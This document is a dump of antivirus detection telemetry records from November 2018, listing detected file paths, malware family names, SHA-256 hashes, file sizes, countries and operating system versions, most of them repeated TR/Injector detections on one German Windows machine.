  Row(detection=Row(filename='avscan-20181102-061013-ee712ffb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061013-EE712FFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061615-c647306a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061615-C647306A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055324-9508b0b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055324-9508B0B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060812-a622a05f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060812-A622A05F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062656-44250c33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062656-44250C33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050941-798f0a8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050941-798F0A8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062541-17cf6a2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062541-17CF6A2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052421-863312dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052421-863312DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052905-2f1847b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052905-2F1847B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053640-3ed5aa61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053640-3ED5AA61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060838-b5836e95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060838-B5836E95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053626-3647f027', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053626-3647F027', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054520-7495084b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054520-7495084B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061136-20144510', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061136-20144510', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060825-ae1e3e3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060825-AE1E3E3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054550-8632e791', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054550-8632E791', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052808-0d724849', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052808-0D724849', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051823-b0ac3dd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051823-B0AC3DD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055306-8a2a2701', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055306-8A2A2701', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055043-34e1435d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055043-34E1435D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053847-89f464e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053847-89F464E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32eb5349', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32EB5349', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060554-54453b8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060554-54453B8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061710-e6dde5ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061710-E6DDE5EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:25:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051406-17a9dc64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051406-17A9DC64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051301-f090f8b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051301-F090F8B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054330-33084fc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054330-33084FC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052526-ac9495a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052526-AC9495A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062259-b71946ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062259-B71946AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054116-e3348c71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054116-E3348C71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050855-5e3c6e11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050855-5E3C6E11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054328-31a16be1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054328-31A16BE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062222-a0db55ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062222-A0DB55AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060940-dac43448', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060940-DAC43448', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051912-cde37a86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051912-CDE37A86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\81C7884894C8204284FCD9A931ECC21E5091366AC3E6B0BB22D16D65B6F7DCE4', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:00:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060110-aaea3288', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060110-AAEA3288', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051205-cf2cc885', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051205-CF2CC885', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecle13_02004.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Excel\\TPRECLE13_02004.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='88cd970ed5ccfa6ed7ec29617394053e0a8cb0fbba2033031b092b46612e814d', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:25:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060740-937285b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060740-937285B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055934-7172c15b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055934-7172C15B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055103-410defee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055103-410DEFEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062130-81beb34c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062130-81BEB34C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:04:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051941-df3dcb98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051941-DF3DCB98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:51:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T15:43:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crashsender1403.exe', filepath='\\?\\J:\\BlackShot\\System\\CrashRpt\\CrashSender1403.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='42209c7554671680a450518e743a56f44cc4bc5062dd52ad85662afb715f3dea', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161215-d82241f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161215-D82241F6', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='25082dc46ff2ad9c2ce9b262ffbafd1b92f201df475cf0e6e88ed9e7df7a2607', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:12:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bcdemo5.exe', filepath='\\\\192.168.1.42\\project\\電腦設備\\johnny 文件檔\\桌面總成\\1553\\Ace545\\visual basic support\\Exe\\BCDEMO5.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3874'), hash='15355493e7e02379ffb11d0a9bc01e27aa09d678d43f5e9d2daf14fc6937334c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ccQAGANXX0yR3\\\\\\/o6.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c6f1ac2632199f5ac4bfdc1615e3e0acf77c0382', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c6f1ac2632199f5ac4bfdc1615e3e0acf77c0382', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='303801a4005b1d6e7bb2f0dc65a0586a13fa7bd1e2477287367af968c6ddd83b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:35:10Z'), dt=datetime.date(2018, 11, 1)),
